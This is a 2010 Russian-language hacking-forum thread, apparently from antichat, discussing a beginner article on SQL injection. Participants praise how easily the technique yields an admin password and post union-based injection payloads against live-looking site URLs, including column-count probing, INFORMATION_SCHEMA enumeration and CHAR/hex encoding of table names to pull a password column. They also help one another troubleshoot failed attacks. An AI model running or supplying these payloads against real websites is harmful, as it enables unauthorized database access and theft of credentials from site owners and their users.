Авторские статьи SQL Injection для "совсем новичков"

Discussion in 'Статьи' started by Boa, 17 Jul 2010.

  1. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    До ненужно. Необходимо только после. Это сделали потому что позволяется арифметическая операция "--".

    Вот смотри, показываю один раз наглядным примером:
    Code:
    mysql> SELECT 1--3;
    +------+
    | 1--3 |
    +------+
    |    4 |
    +------+
    1 row in set (0.00 sec)
    
    mysql> SELECT 1-- 3;
        -> ;
    +---+
    | 1 |
    +---+
    | 1 |
    +---+
    1 row in set (0.00 sec)
    Понимаешь?
     
  2. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Пробел до и после комментария я взял из полного FAQ по скулям, в этом же разделе. Достаточное объяснение? :)
     
    2 people like this.
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    Это, наверное, очень внушительно прозвучать должно было?
    --
    Достаточное объяснение будет когда ты приведешь мне цитату из официальной документации.

    А в документации написано:

     
    1 person likes this.
  4. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    476
    Likes Received:
    190
    Reputations:
    221
    а для меня +--+ это просто дело привыки, как и id=1+and+1=2, а не id=-1(или чтото вроде того)


    а на это есть вот это https://forum.antichat.ru/thread30641.html
     
    #24 Seravin, 22 Jul 2010
    Last edited: 22 Jul 2010
  5. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    957
    Likes Received:
    845
    Reputations:
    402
    статья "проводим простейшую SQL инъекцию на примере сайта ***"

    думается мне, она способна показать новичку, насколько "просто" иногда можно заполучить пасс админа, и тем самым пробудить у него интерес к тому, чтобы изучить SQL-inj более детально.

    понравилось.
    Если Ты - новичек, и тебе тоже понравилась эта статья - советую ознакомиться с еще одной (уже указывавшейся ранее) от Dr.Z3r0 (https://forum.antichat.ru/thread43966.html)
    Она читается немного по-тяжелее, да и наглядного примера там нет, но зато она сможет дать тебе ответы на многие вопросы из тех, что у тебя могли возникнуть после прочтения этой статьи.
     
    #25 ErrorNeo, 22 Jul 2010
    Last edited: 22 Jul 2010
    2 people like this.
  6. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,105
    Likes Received:
    305
    Reputations:
    86
    Привет, ТС.

    Я подобрал число таблиц, теперь пытаюсь сделать так: Причем, походу, таблица одна, т.к. только при еденице все отображается.
    http://site.com/lol.php?id=-1+union+select+1+--+
    Но получаю
    The used SELECT statements have a different number of columns​
    Без всяких других ошибок. Если делаю больше (1,2,3) то получаю еще ошибки ПХП (Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource) Однако подставив select+1,2,3,4,5,6,7,8,9,10,11 я получаю только Варнинги, но и страница корректно не отображается, но она отображается лучше, чем когда подставишь до 12 (у нее есть задуманый автором цвет). Че это такое?
     
    _________________________
    #26 fl00der, 24 Jul 2010
    Last edited: 24 Jul 2010
  7. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Встречал такие, просто подбирал число, чтобы при следующем числе число всяких ошибок и инфа на странице летели к чертям.
     
    1 person likes this.
  8. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    Он это и сделал, но появляется другая ошибка: "The used SELECT statements have a different number of columns". В чем проблема? :D
     
    1 person likes this.
  9. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    В статье др. Зеро написано. А моя и не претендует на объяснение всего и вся.
     
  10. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,105
    Likes Received:
    305
    Reputations:
    86
    Ваще не понял, че надо сделать.
    При еденице нет ворнингов, но число это явно маловато.
    При 11 есть ворнинги, но нет ошибки SQL, т.е. как будто, это искомое число столбцов. Однако, когда я делаю id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11 я получаю варнинги, а не получаю ту "фигню" с "большим и красивым числом 19" (ну у меня, уж наверное, это будет не 19, я это осознаю).
    Что же это? Какой-то хитрый/недописаный фильтор? Если ты говоришь, что такое встречал, то, все-таки, что ты при этом делал?
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    скин в личкy, посмотрю
     
    _________________________
  12. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    611
    Likes Received:
    117
    Reputations:
    37
    fl00der, клац.

    Оставлял и искал другие :D
     
  13. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    fl00der, никакой это не фильтр, это обычный двойной SQL запрос. Вот пример https://forum.antichat.ru/thread175335-%E4%E2%EE%E9%ED%EE%E9+sql.html
    Но увы, здесь нету универсального решения. Для каждого случая нужно составлять свою инъекцию.

    Аналогично :)
     
    #33 Sams, 25 Jul 2010
    Last edited: 25 Jul 2010
  14. Угрюмый

    Угрюмый Elder - Старейшина

    Joined:
    3 Sep 2006
    Messages:
    210
    Likes Received:
    210
    Reputations:
    5
    Boa !
    Не обращай внимания на критику. Статья нужная (имхо). Да, она не для гуру, а для самых начинающих. О чем ты и сообщил в самом начале статьи.
    Лично мне она дала толчок и желание все же изучать данную тему. ДУмаю, что и многим другим начинающим она поможет.

    Уважаемые гуру и кул-хацкеры!
    Критиковать и тыкать носом в неточности и поверхностность статьи легче всего.
    Но напомню - статья совсем не претендует на звание научного труда или революционные изыскания. И написана скорее для популяризации темы. О чем автор и предупреждает в самом начале (первые два абзаца).
    И я считаю что с этой задачей статья справляется.
     
  15. ICEPack

    ICEPack New Member

    Joined:
    19 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Очень интересная и познавательная статья мне как новичку очень пригодилась !
    написано всё доходчиво и понятно +
     
  16. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    Boa, продолжай в том же духе, пиши еще.
    Прочитал бы её на пару месяцев раньше, уточнил бы для себя многие моменты.
     
  17. Sajeys

    Sajeys Banned

    Joined:
    24 Aug 2010
    Messages:
    220
    Likes Received:
    37
    Reputations:
    5
    Для первой просто великолепно...
     
  18. J0cker

    J0cker New Member

    Joined:
    27 Feb 2010
    Messages:
    62
    Likes Received:
    4
    Reputations:
    0
    Привет всем.У меня небольшая непонятка вышла :(

    Code:
    http://www.xxx.ru/news.php?id=774+and+1=0+union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,column_name,20,21,22+from+INFORMATION_SCHEMA.COLUMNS+w  here+table_name=CHAR(65,100,109,105,110,83,105,116  ,101)+--+
    Имя таблицы перевел в Ascii так как с простым именем таблицы получаю ошибку.Ради эксперимента переводил в Hax тож отлично работает до такого замечательного момента как вывод информации из столбца.

    а именно

    Code:
    union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+from+CHAR(65,100,109,105,110,83,105,116  ,101)+--+
    это безобразие типо
    Code:
    CHAR(65,100,109,105,110,83,105,116  ,101)
    Менял на Hax(0x5573657273) в надежде что что то изменится но увы не чего не вышло.
    Кто подскажет в чем ошибка что не так.
     
  19. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    Зачем таблицу чарить?
    Code:
    union+select+1,2,3,4,5,6,7  ,8,9,10,11,12,13,14,15,16,17,18,passwod,20,21,22+from+[B]TABLE[/B]+--+
    
     
  20. J0cker

    J0cker New Member

    Joined:
    27 Feb 2010
    Messages:
    62
    Likes Received:
    4
    Reputations:
    0
    Ну если я могу получить имена столбцов только через "Char" или "Hax" (Если указывать просто имя таблицы типа "Users" получу ошибку)
    Предположил что так же стоит поступить и при выводе инфы. из столбцов.Но увы пока без успешно.
     
Loading...
Similar Threads - Injection новичков
  1. eclipse
    Replies:
    0
    Views:
    6,530
  2. aka_zver
    Replies:
    2
    Views:
    10,503
  3. bons
    Replies:
    0
    Views:
    5,058
  4. LoFFi
    Replies:
    11
    Views:
    7,794